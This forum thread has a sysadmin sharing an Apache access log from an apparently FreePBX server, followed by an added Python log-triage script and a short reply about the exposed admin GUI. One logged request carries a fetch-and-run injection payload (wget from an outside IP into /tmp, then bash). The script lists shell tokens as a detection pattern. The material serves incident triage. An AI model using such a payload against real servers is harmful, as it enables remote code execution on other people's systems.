Firewall flagged outbound to 144.172.105.25 as suspicious

My firewall flagged as suspicious an outbound connection to 144.172.105.25 from httpd at around 6:30AM. It is contained in a block of GET/PUT actions that also look odd. I’m posting the block here, given the security holes of late, wondering if this is an indication of more problems. If anyone has any ideas I’d appreciate knowing about them. Found in /var/log/httpd/access_log:

85.237.194.165 - - [02/Oct/2025:05:33:57 -0700] "GET /admin/config.php HTTP/1.1" 200 11744 "-" "-"
85.237.194.165 - - [02/Oct/2025:05:33:57 -0700] "POST /admin/config.php HTTP/1.1" 200 11870 "https://x.x.x.x/admin/config.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
124.198.131.112 - - [02/Oct/2025:05:34:00 -0700] "GET / HTTP/1.0" 400 362 "-" "-"
193.24.123.88 - - [02/Oct/2025:05:34:26 -0700] "GET /robots.txt HTTP/1.1" 403 212 "-" "curl/7.29.0"
193.24.123.88 - - [02/Oct/2025:05:35:17 -0700] "-" 408 - "-" "-"
167.71.32.8 - - [02/Oct/2025:05:39:59 -0700] "GET /PBX.php?cmd=wget%20http://45.234.176.202/new/c%20-O%20/tmp/b;bash%20/tmp/b HTTP/1.1" 404 205 "-" "python-requests/2.32.4"
167.71.32.8 - - [02/Oct/2025:05:40:00 -0700] "GET / HTTP/1.0" 400 362 "-" "-"
54.234.157.230 - - [02/Oct/2025:05:41:05 -0700] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
176.65.149.195 - - [02/Oct/2025:05:41:17 -0700] "GET /.env HTTP/1.1" 403 206 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3"
127.0.0.1 - - [02/Oct/2025:05:43:26 -0700] "GET /admin/ajax.php?forceRefresh&module=zulu&command=api&query=/user/config/turnsettings HTTP/1.1" 200 416 "-" "-"
185.242.226.107 - - [02/Oct/2025:05:45:03 -0700] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.107 - - [02/Oct/2025:05:45:03 -0700] "GET /admin HTTP/1.1" 301 237 "https://x.x.x.x:443/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.107 - - [02/Oct/2025:05:45:03 -0700] "GET /admin/ HTTP/1.1" 302 - "https://x.x.x.x:443/admin" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.107 - - [02/Oct/2025:05:45:04 -0700] "GET /admin/config.php HTTP/1.1" 200 11744 "https://x.x.x.x/admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
85.237.194.186 - - [02/Oct/2025:05:49:08 -0700] "GET /admin/config.php HTTP/1.1" 200 11744 "-" "-"
85.237.194.186 - - [02/Oct/2025:05:49:09 -0700] "POST /admin/config.php HTTP/1.1" 200 11870 "https://x.x.x.x/admin/config.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
185.242.226.107 - - [02/Oct/2025:05:50:18 -0700] "GET /assets/images/badge.png HTTP/1.1" 404 221 "-" "Python/3.7 aiohttp/3.8.1"
185.242.226.107 - - [02/Oct/2025:05:50:18 -0700] "GET /images/favicon.ico HTTP/1.1" 404 216 "-" "Python/3.7 aiohttp/3.8.1"
65.49.1.66 - - [02/Oct/2025:05:58:23 -0700] "\x16\x03\x01" 400 226 "-" "-"
85.237.194.202 - - [02/Oct/2025:06:04:25 -0700] "GET /admin/config.php HTTP/1.1" 200 11744 "-" "-"
85.237.194.202 - - [02/Oct/2025:06:04:26 -0700] "POST /admin/config.php HTTP/1.1" 200 11870 "https://x.x.x.x/admin/config.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
45.156.129.133 - - [02/Oct/2025:06:10:46 -0700] "GET / HTTP/1.1" 403 215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.32.248.162 - - [02/Oct/2025:06:15:12 -0700] "HEAD / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
101.33.81.73 - - [02/Oct/2025:06:17:21 -0700] "GET / HTTP/1.1" 403 215 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
85.237.194.164 - - [02/Oct/2025:06:19:41 -0700] "GET /admin/config.php HTTP/1.1" 200 11744 "-" "-"
85.237.194.164 - - [02/Oct/2025:06:19:41 -0700] "POST /admin/config.php HTTP/1.1" 200 11870 "https://x.x.x.x/admin/config.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
87.236.176.49 - - [02/Oct/2025:06:24:32 -0700] "GET / HTTP/1.1" 400 11 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
144.172.105.25 - - [02/Oct/2025:06:27:04 -0700] "GET /config/getuser?index=0 HTTP/1.1" 403 216 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
85.237.194.196 - - [02/Oct/2025:06:34:53 -0700] "GET /admin/config.php HTTP/1.1" 200 11744 "-" "-"
85.237.194.196 - - [02/Oct/2025:06:34:53 -0700] "POST /admin/config.php HTTP/1.1" 200 11870 "https://x.x.x.x/admin/config.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
51.159.23.43 - - [02/Oct/2025:06:36:46 -0700] "GET / HTTP/1.1" 302 - "-" "-"
37.60.141.156 - - [02/Oct/2025:06:40:22 -0700] "GET / HTTP/1.1" 403 215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"

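As an added example (not from the original post, and not FreePBX code), here is a small Python triage script for access_log lines in the combined format shown above. It flags the three patterns visible in that block: a decoded query string carrying fetch-and-run tokens, a sensitive path answering 200 to an outside address, and accepted POSTs to /admin/ counted per /24 so that hosts rotating inside the 85.237.194.0/24 block land in one bucket. The request-line regex, the token list and the path list are assumptions chosen for illustration; the sample lines are abridged from the post (user-agents shortened).

```python
import re
from collections import Counter
from urllib.parse import unquote

LOG_RE = re.compile(  # Apache combined: ip ident user [time] "request" status bytes "referer" "ua"
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
SHELL_TOKENS = ("wget ", "curl ", "bash ", "/tmp/")                  # assumed; decoded query fragments
SENSITIVE_PATHS = ("/.env", "/admin/config.php", "/config/getuser")  # assumed; should never 200 from outside

def parse(line):
    # Returns a field dict, or None for a line that is not in combined format.
    if not (m := LOG_RE.match(line.strip())):
        return None
    d = m.groupdict()
    parts = d["req"].split(" ")
    d["method"] = parts[0] if len(parts) == 3 else None   # "-" or raw TLS bytes -> None
    d["path"] = unquote(parts[1]) if len(parts) == 3 else d["req"]
    return d
def flag(e):
    # Reasons one parsed entry deserves a second look; an empty list means nothing odd.
    reasons = []
    if e["method"] is None:
        reasons.append("malformed request line")
    path, _, query = e["path"].partition("?")
    if any(t in query for t in SHELL_TOKENS):
        reasons.append("shell-like tokens in query string")
    if e["ip"] != "127.0.0.1" and e["status"] == "200" and path.startswith(SENSITIVE_PATHS):
        reasons.append("sensitive path served 200 to external client")
    if e["method"] == "POST" and path.startswith("/admin/") and e["status"] == "200":
        reasons.append("admin POST accepted")
    return reasons
def triage(text):
    # Flag lines and count accepted admin POSTs per /24, so hosts rotating inside one block stand out.
    flagged, posts_by_net = [], Counter()
    for line in text.splitlines():
        if (e := parse(line)) and (r := flag(e)):
            flagged.append((e["ip"], e["method"], e["path"], r))
            if "admin POST accepted" in r:
                posts_by_net[".".join(e["ip"].split(".")[:3]) + ".0/24"] += 1
    return flagged, posts_by_net
# Sample lines abridged from the post above (user-agents shortened).
SAMPLE = """\
85.237.194.165 - - [02/Oct/2025:05:33:57 -0700] "GET /admin/config.php HTTP/1.1" 200 11744 "-" "-"
85.237.194.165 - - [02/Oct/2025:05:33:57 -0700] "POST /admin/config.php HTTP/1.1" 200 11870 "https://x.x.x.x/admin/config.php" "Firefox/142.0"
167.71.32.8 - - [02/Oct/2025:05:39:59 -0700] "GET /PBX.php?cmd=wget%20http://45.234.176.202/new/c%20-O%20/tmp/b;bash%20/tmp/b HTTP/1.1" 404 205 "-" "python-requests/2.32.4"
127.0.0.1 - - [02/Oct/2025:05:43:26 -0700] "GET /admin/ajax.php?forceRefresh&module=zulu&command=api HTTP/1.1" 200 416 "-" "-"
85.237.194.186 - - [02/Oct/2025:05:49:09 -0700] "POST /admin/config.php HTTP/1.1" 200 11870 "https://x.x.x.x/admin/config.php" "Firefox/142.0"
65.49.1.66 - - [02/Oct/2025:05:58:23 -0700] "\\x16\\x03\\x01" 400 226 "-" "-"
"""
```

Running `triage(open("/var/log/httpd/access_log").read())` on the full file gives the flagged rows plus the per-/24 POST counts; the localhost ajax.php call is deliberately left unflagged.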

Why does this look like your admin GUI is open to the world?


While it is limited by IPs in freepbx.conf, we use Sangoma Desktop for employees in the Philippines who need to authenticate against http.
